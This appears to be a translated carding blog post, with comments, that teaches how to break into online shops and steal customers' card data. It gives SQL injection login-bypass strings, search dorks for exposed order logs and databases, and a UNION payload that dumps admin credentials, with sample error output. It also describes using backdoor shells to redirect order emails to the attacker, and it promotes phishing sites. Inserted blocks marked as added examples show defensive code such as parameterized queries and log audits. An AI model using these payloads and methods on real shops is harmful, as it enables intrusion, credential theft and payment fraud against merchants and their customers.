Let's get straight to it, no small talk :D,, kisses first, mwah mwah :* :*
1. Technique Using a Default Admin User & Password – Basic SQL Injection
This technique uses an SQL injection weakness in the login string. It is quite easy: just enter the codes below as the user and password on the login page of a store admin website. The user and password codes include:
admin:' or a=a--
admin:' or 1=1--
user:' or 1=1--
admin:' or 1=1--
etc.
Example:
Search Google for the keywords: "/shopadmin.asp" or "/adminshop.asp" or "/shopadm.asp" or "/shoppingadmin.asp"
Example target: http://www.namasitusnya.com/shop/admin/shopadmin.asp
Enter the password combinations I listed above; if you get in, you have succeeded.
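The login strings in section 1 only work where the login form's input is concatenated into the SQL text. The following is an added example, not code from the original post: it uses Python's sqlite3 with a constructed `admins` table and hypothetical function names to show the `' or 1=1--` password being accepted by a concatenated query and rejected by a parameterized one.

```python
import sqlite3

def make_db():
    """Constructed sample data: one admin account in an in-memory database.
    (A real table would hold password hashes; plain text keeps the demo short.)"""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (login TEXT, password TEXT)")
    db.execute("INSERT INTO admins VALUES ('admin', 's3cret-sample')")
    return db

def login_vulnerable(db, user, password):
    # The input is pasted into the SQL text, so a quote in the input ends the
    # string literal and whatever follows is parsed as SQL.
    sql = ("SELECT login FROM admins WHERE login = '" + user +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, user, password):
    # Placeholders pass the values separately from the SQL text, so quotes
    # and comment markers are compared as ordinary data.
    sql = "SELECT login FROM admins WHERE login = ? AND password = ?"
    return db.execute(sql, (user, password)).fetchone() is not None

if __name__ == "__main__":
    db = make_db()
    attempt = ("admin", "' or 1=1--")
    print("concatenated query accepts it: ", login_vulnerable(db, *attempt))
    print("parameterized query accepts it:", login_parameterized(db, *attempt))
```
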
2. Shopping Order Log – Order Log Information on the Server
This is very easy to obtain; various logs are stored on various servers, usually in the form of *.log, *.rtf, *.txt, *.xls, etc. So how do you get this information on the target website? That depends on your imagination in finding it. Usually this is on servers based on .cgi, .asp, .php, etc.
Example:
Search Google for the keywords: "order.txt" or "order.log" or "order.asp" or "order.cgi"
or inurl:order filetype:txt / inurl:order filetype:log etc.
Example targets:
http://www.namasitusnya.net/shop/admin/log/order.log
http://www.namasitusnya.org/shop/order.cgi?dir=./order/order.log
http://www.namasitusnya.la/shopping/DCShop/orders/orders.txt
Happy finding
3. Database Information – Database Source Location – Database Path
In this part, we obtain information about the database location, so that we can download the database that is on the server. Most of the ones included on the server are .mdb.
Example:
Search Google for the keywords: "*.mdb" or "order.mdb" or "database.mdb"
or use DB info: inurl: ESHOP, Lobby.asp, Proddetail.asp etc.
Example targets:
http://www.namasitusnya.com/shop/shopadmin/database.mdb
http://www.namasitusnya.org//cgi-bin/eshop/database/order.mdb
http://www.namasitusnya.com/fpdb/shop.mdb
http://www.namasitusnya.com/shopping/data/vsproducts.mdb
Happy searching.. ^^
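Sections 2 and 3 both depend on order logs and database files sitting inside the web root where the server will hand them out. The following is an added example, not part of the original post: a check a shop operator can run over their own access log to separate sensitive files that were actually served (2xx) from requests that were only probes. The log lines are constructed, and the function names and the "order" filename heuristic are assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Extensions the post lists for order logs and downloadable databases.
SENSITIVE_EXT = (".log", ".rtf", ".txt", ".xls", ".mdb")
REQUEST = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+" (\d{3}) ')

# Constructed access-log lines (documentation IP ranges; paths follow the
# style of the post's examples).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2012:10:01:02 +0000] "GET /shop/admin/log/order.log HTTP/1.1" 200 48213',
    '203.0.113.7 - - [10/Mar/2012:10:01:05 +0000] "GET /fpdb/shop.mdb HTTP/1.1" 404 312',
    '198.51.100.4 - - [10/Mar/2012:10:02:00 +0000] "GET /shop/order.cgi?dir=./order/order.log HTTP/1.1" 200 9120',
    '198.51.100.9 - - [10/Mar/2012:10:03:00 +0000] "GET /shop/index.php HTTP/1.1" 200 5120',
]

def is_sensitive(url):
    """True if the path or the query string names an order log or a database."""
    parts = urlsplit(unquote(url).lower())
    # The query is checked too, because a CGI parameter can name the file.
    for candidate in (parts.path, parts.query):
        if candidate.endswith(".mdb"):
            return True
        if "order" in candidate and candidate.endswith(SENSITIVE_EXT):
            return True
    return False

def audit(lines):
    """Split sensitive requests into files actually served and mere probes."""
    report = {"served": [], "probed": []}
    for line in lines:
        match = REQUEST.search(line)
        if match and is_sensitive(match.group(1)):
            served = match.group(2).startswith("2")
            report["served" if served else "probed"].append(match.group(1))
    return report

if __name__ == "__main__":
    for kind, urls in audit(SAMPLE_LOG).items():
        for url in urls:
            print(kind, url)
```

Anything in the "served" list is a file to move outside the document root or block at the web server; "probed" entries show scanning that did not succeed.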
4. SQL Injection Advanced Shop Vulnerability
This part explains techniques that use SQL injection, with a few combinations: union, join, select, update, etc. This tutorial assumes you have already been able to use SQL injection before.
Example:
Open Google with the key: "product_details.php?item_id=" or "products_rss.php" etc.
http://www.targetnya.com/shop/product_details.php?item_id=13
Replace that text with:
products_rss.php?category_id=1' UNION SELECT concat(login,char(58),password),0 FROM va_admins -- /*
so it becomes:
http://www.targetnya.com/shop/products_rss.php?category_id=1' UNION SELECT concat(login,char(58),password),0 FROM va_admins -- /*
Then if an error like this appears:
DB ERROR 1064
We are very sorry, but an error has occurred while processing your request. Please try the operation again by either pressing the Refresh button on your browser, or by going back one page using the Back button. If the error persists, please contact our web development team.
The details of the error are shown below. Please quote this in any correspondance regarding this problem.
Page URL: http://www.targetnya.com/shop/products_rss.php?category_id=1'%20UNION%20SELECT%20concat(login,char(58),password),0%20FROM%20va_admins%20--%20/*
Referrer URL:
Database error: Invalid SQL: SELECT i.item_id, i.item_type_id, i.item_code, i.item_name, i.friendly_url, i.short_description, i.small_image, i.small_image_alt, i.big_image, i.big_image_alt, i.price, i.is_sales, i.sales_price, i.is_points_price, i.points_price, i.buy_link, i.is_sales, i.full_description, i.manufacturer_code, i.issue_date, ic.category_id, c.category_name, c.short_description AS category_short_description, c.full_description AS category_full_description FROM ((va_items i INNER JOIN va_items_categories ic ON i.item_id=ic.item_id AND ic.category_id IN (1' UNION SELECT concat(login,char(58),password),0 FROM va_admins -- /*,Admin:cca293929882ad831bf724a2589f1e20)) LEFT JOIN va_categories c ON c.category_id = ic.category_id ) WHERE i.is_showing = 1 GROUP BY i.item_id ORDER BY i.item_order, i.item_id
MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' UNION SELECT concat(login,char(58),password),0 FROM va_admins -- /*,Admin:cca2' at line 1
Once that's done, don't forget to decrypt the password.
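The error page in section 4 shows two separate defects: `category_id` is pasted into an `IN (...)` list, and the failed statement is echoed back to the visitor in full. The following is an added example, not code from the original post or from the shop software: a handler that accepts only a comma-separated list of integers, binds them through placeholders, and returns a generic message on database errors. The table names come from the error dump above; the rows, function names and status codes are constructed.

```python
import sqlite3

def make_db():
    """Constructed sample rows; table names taken from the error dump."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE va_items (item_id INTEGER, item_name TEXT);
        CREATE TABLE va_items_categories (item_id INTEGER, category_id INTEGER);
        INSERT INTO va_items VALUES (1, 'Sample item A'), (2, 'Sample item B');
        INSERT INTO va_items_categories VALUES (1, 1), (2, 2);
    """)
    return db

def parse_category_ids(raw):
    """Accept only a comma-separated list of decimal integers."""
    ids = []
    for part in raw.split(","):
        part = part.strip()
        # Quotes, spaces, keywords and comment markers all fail this test.
        if not (part.isascii() and part.isdigit()):
            raise ValueError("invalid category_id")
        ids.append(int(part))
    return ids

def items_in_categories(db, raw_category_id):
    ids = parse_category_ids(raw_category_id)
    placeholders = ",".join("?" * len(ids))  # one "?" per id, e.g. "?,?"
    sql = ("SELECT i.item_name FROM va_items i "
           "JOIN va_items_categories ic ON i.item_id = ic.item_id "
           "WHERE ic.category_id IN (" + placeholders + ") ORDER BY i.item_id")
    return [row[0] for row in db.execute(sql, ids)]

def handle_request(db, raw_category_id):
    """Return (status, body); the body never contains SQL or driver messages."""
    try:
        return 200, items_in_categories(db, raw_category_id)
    except ValueError:
        return 400, "Bad request"
    except sqlite3.Error:
        # Details belong in the server-side log, not in the response.
        return 500, "Internal error"
```
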
5. Admin Shop Send Mail Order
This part is very simple. First you have to know the administrator database, which is usually in the shop admin's config.
Example:
Look for an injectable target on Google until you find one and can run rshell / c99 / another backdoor.
Example target: http://www.namasitusnya.com/admin/shop/rshellbackdoorloe.php
Now that you are in its shell, look for the config file until you find it: config.php, db.php, configuration.php, database.php, db.asp, etc. Then open / cat that file until you find config contents such as:
var $dbtype = 'mysql';
var $host = 'localhost';
var $user = 'shop24_admin';
var $db = 'shopsex_site';
var $mailer = 'mail';
var $ordermailsendto = 'ben@netboost.com.au';
In the part "var $ordermailsendto = 'ben@netboost.com.au';" of the config, just replace it with your own email, for example change it to: "var $ordermailsendto = 'carding@gwdapetcarding.com';".
Then just wait for the order results in your email. Simple but tasty.. Hahaha..
6. Phishing & Scamming
Ta-da.. This is what people do the most nowadays. Hahaha.. Phishing & scamming. It's really easy.. You can just make a fake site and pretend to sell things, but actually you take the card data from the target. However, there are some requirements that must be met. The requirement: you must have your own convincing domain. That is, the front page already shows your website's registered trade mark, which makes the victim believe that the site is real, not a scam. On an injected website it gets rather messy; mostly 90% fail on a website obtained by injection. Scam & phishing have been explained a lot, so you surely know how it's done.
First, you have to download the complete source for your scam + phishing, then install it on your server. Wait for the results in your email, because usually a scam set sends them to the owner's email.
That's all from me, happy surfing..
All actions are your own responsibility..
Make knowledge a valuable lesson in life!
source: Manusia Biasa Team
I can already do this, bro, but I'm too lazy to show off...
oh yeah, let's follow back, bro, or else backlink. I've already put your link at:
[http://dc-cyber4rt.blogspot.com/2012/03/back-link-gratis-dgn-dc-cyber4rt.html]
waiting for your backlink, bro :* =)) =))
hohoho .. awesome, bro ..
oh yeah .. just by commenting on this blog you already get a backlink, bro .. :D